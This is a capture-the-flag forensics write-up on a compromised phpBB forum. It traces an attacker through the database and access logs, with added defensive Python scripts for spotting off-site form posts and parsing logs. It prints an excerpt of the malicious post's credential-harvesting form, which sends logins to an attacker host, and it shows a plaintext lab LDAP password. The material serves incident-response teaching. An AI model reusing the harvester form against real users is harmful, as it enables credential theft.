Mostly just jotting down notes with this one.

SOLUTION

Looked through database; found the phpbb_posts table

![](found malicious post.png)

Its post_id is 9. The user who submitted it is apoole1.

Take the value of that post_text field and paste it into an HTML template file. Open it in a browser and you can see it’s a credential harvester.

![](malicious post.png)

Note that it probably would have rendered normally on the target’s computer.

The post was just some malicious HTML. It pretends your session is expired, prompts for login, then shows you the “real” post after submitting the form.

Here’s how the source code of that login widget works:

<form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username"
    target="hiddenframe">
    <div class="panel">
        ...
    </div>
</form>

It bounces the submission off of the attacker’s site: http://10.10.0.78/update.php. The attacker may have used multiple IPs, but now this 10.10.0.78 is at the top of our “Most Wanted” list.
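A defender can find this kind of stored post without opening every row by hand: scan post_text for forms whose action points at a host other than the forum’s own. The scanner below is an added example, not part of this write-up or of phpBB; the forum host 10.10.0.27 is taken from the Referer in the access.log line later in the post, and the sample rows are constructed to mimic phpbb_posts (post_id, poster name, post_text).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Host the forum itself lives on (assumption: taken from the Referer in the access.log)
FORUM_HOST = "10.10.0.27"


class FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> in a fragment of post HTML."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action", "") or "")


def offsite_form_actions(post_text, forum_host=FORUM_HOST):
    """Return form actions that submit to a host other than the forum's own.

    Relative actions (no host) and actions on the forum host are legitimate
    phpBB behaviour and are ignored; anything absolute and elsewhere is flagged.
    """
    collector = FormActionCollector()
    collector.feed(post_text)
    flagged = []
    for action in collector.actions:
        host = urlparse(action).hostname
        if host and host != forum_host:
            flagged.append(action)
    return flagged


def find_harvester_posts(rows, forum_host=FORUM_HOST):
    """Scan (post_id, poster, post_text) rows and report posts with off-site forms."""
    hits = []
    for post_id, poster, text in rows:
        actions = offsite_form_actions(text, forum_host)
        if actions:
            hits.append((post_id, poster, actions))
    return hits


# Constructed sample rows standing in for a SELECT on phpbb_posts
SAMPLE_POSTS = [
    (7, "bob", "<p>Anyone tried the new release yet?</p>"),
    (9, "apoole1",
     '<p>Your session has expired, please log in again.</p>'
     '<form action="http://10.10.0.78/update.php" method="post" id="login" target="hiddenframe">'
     '<input name="username"><input name="password" type="password"></form>'),
    (12, "alice",
     '<form action="./search.php" method="get"><input name="q"></form>'),
]

if __name__ == "__main__":
    for post_id, poster, actions in find_harvester_posts(SAMPLE_POSTS):
        print(f"post_id={post_id} by {poster}: form submits to {actions}")
```

Run against a real dump, feed it the rows from phpbb_posts and keep the forum host set to whatever the site actually answers on; a post that legitimately embeds a form will almost always use a relative action, so the off-site check produces very few false positives.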

We grep access.log for 10.10.0.78 to see when that malicious post was made:

10.10.0.78 - - [25/Apr/2023:13:17:22 +0100] "POST /posting.php?mode=post&f=2&sid=a179c2e371e54de2833cec27f5cd86f5 HTTP/1.1" 302 294 "http://10.10.0.27/posting.php?mode=post&f=2&sid=a179c2e371e54de2833cec27f5cd86f5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"

Here we can see the authentication request from when that user logged in to the admin panel:

![authentication as admin](authentication as admin.png)

Note the request where their session ID changes:

![session id change](session id change.png)

It all went down at 2023-04-26 11:53:12 +0100. In UTC, that’s 26/04/2023 10:53:12.

We can also see them downloading some backup:

![](downloading backup.png)

HTB asks us about an LDAP password. I haven’t seen any, so I search the DB:

![search db full text](search db full text.png)

Results indicate it’s in the phpbb_config table.

![](plaintext password.png)

There it is: Passw0rd1.

HTB also asks for the UA of the admin user. Just grep for it and exclude entries with the malicious IP:

grep 'GET /adm/index.php' access.log | grep -v 10.10.0.78

It’s Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36

![](apoole1 sets self to admin.png)

date -d @1682506431 -u
# Wed 26 Apr 2023 10:53:51 AM UTC

For the last flag, just grep for download and look for the file that doesn’t fit:

10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
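The grep steps above (the attacker’s POST to posting.php, the admin user agent on /adm/index.php, and the odd-one-out backup download, plus the date -d conversion of the epoch in the file name) can be done in one pass over the combined-format log. The script below is an added example, not from this write-up or from GoAccess; the attacker IP comes from the form action in the post, and the sample log is constructed from the two lines quoted above plus three invented filler lines (the 10.10.0.50 and 10.10.0.31 hosts and their sid values are made up).

```python
import re
from datetime import datetime, timezone

# Apache/nginx "combined" log format, the same format GoAccess is told about below
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# phpBB backup dumps are named backup_<epoch>_<random>.sql.gz
BACKUP_RE = re.compile(r"/store/backup_(?P<epoch>\d+)_[A-Za-z0-9]+\.sql\.gz$")

ATTACKER_IP = "10.10.0.78"  # from the form action in the malicious post


def parse_line(line):
    """Parse one combined-format line into a dict; timestamp normalised to UTC."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # the bracketed timestamp carries its own offset (+0100 in these logs)
    rec["time_utc"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    return rec


def parse_log(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def post_submissions(records, ip):
    """UTC times at which this IP submitted a new forum post (POST /posting.php?mode=post)."""
    return [
        r["time_utc"].strftime("%Y-%m-%d %H:%M:%S UTC")
        for r in records
        if r["ip"] == ip and r["method"] == "POST" and r["path"].startswith("/posting.php?mode=post")
    ]


def admin_panel_user_agents(records, exclude_ip):
    """Distinct user agents that reached the ACP, ignoring the attacker's own requests."""
    return sorted({
        r["ua"] for r in records
        if r["path"].startswith("/adm/index.php") and r["ip"] != exclude_ip
    })


def backup_downloads(records):
    """Successful fetches of backup dumps, with the epoch in the file name decoded to UTC."""
    hits = []
    for r in records:
        m = BACKUP_RE.match(r["path"])
        if m and r["status"] == "200":
            created = datetime.fromtimestamp(int(m.group("epoch")), tz=timezone.utc)
            hits.append((r["ip"], r["time_utc"].isoformat(), r["path"], created.isoformat()))
    return hits


# Constructed sample: two lines quoted in the write-up plus three invented filler lines
SAMPLE_LOG = """\
10.10.0.50 - - [26/Apr/2023:11:40:05 +0100] "GET /adm/index.php?sid=0a1b2c HTTP/1.1" 200 5120 "http://10.10.0.27/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
10.10.0.78 - - [25/Apr/2023:13:17:22 +0100] "POST /posting.php?mode=post&f=2&sid=a179c2e371e54de2833cec27f5cd86f5 HTTP/1.1" 302 294 "http://10.10.0.27/posting.php?mode=post&f=2&sid=a179c2e371e54de2833cec27f5cd86f5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
10.10.0.78 - - [26/Apr/2023:11:55:10 +0100] "GET /adm/index.php?sid=ffeeddcc HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
10.10.0.31 - - [26/Apr/2023:11:58:42 +0100] "GET /download/file.php?id=3 HTTP/1.1" 200 20481 "http://10.10.0.27/viewtopic.php?t=5" "Mozilla/5.0 (X11; Linux x86_64) Firefox/110.0"
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
"""

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("post submissions by attacker:", post_submissions(recs, ATTACKER_IP))
    print("admin panel user agents:", admin_panel_user_agents(recs, ATTACKER_IP))
    for hit in backup_downloads(recs):
        print("backup download:", hit)
```

Swap SAMPLE_LOG for open("access.log").read() to run it on the real file. Doing the offset conversion in code rather than in your head matters here: the log is stamped +0100, HTB wants UTC, and the epoch inside the backup file name is already UTC, so the two timestamps for the same dump only line up once both are in the same zone.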

Although in all honesty I found it first in GoAccess:

![](GoAccess downloading backup.png)

Using GoAccess

It’s super easy. Just use docker or podman:

podman run --rm -v ./access.log:/var/log/access.log -v .:/output allinurl/goaccess /var/log/access.log --log-format=COMBINED -o /output/report.html

Map the access.log to the correct file, run the above, then read the output file:

firefox report.html

It’ll load up this nifty dashboard. Functionality is limited, but it’s a great companion to grep.

![Dashboard](GoAccess dashboard.png)


Thanks for reading

🤝🤝🤝🤝
@4wayhandshake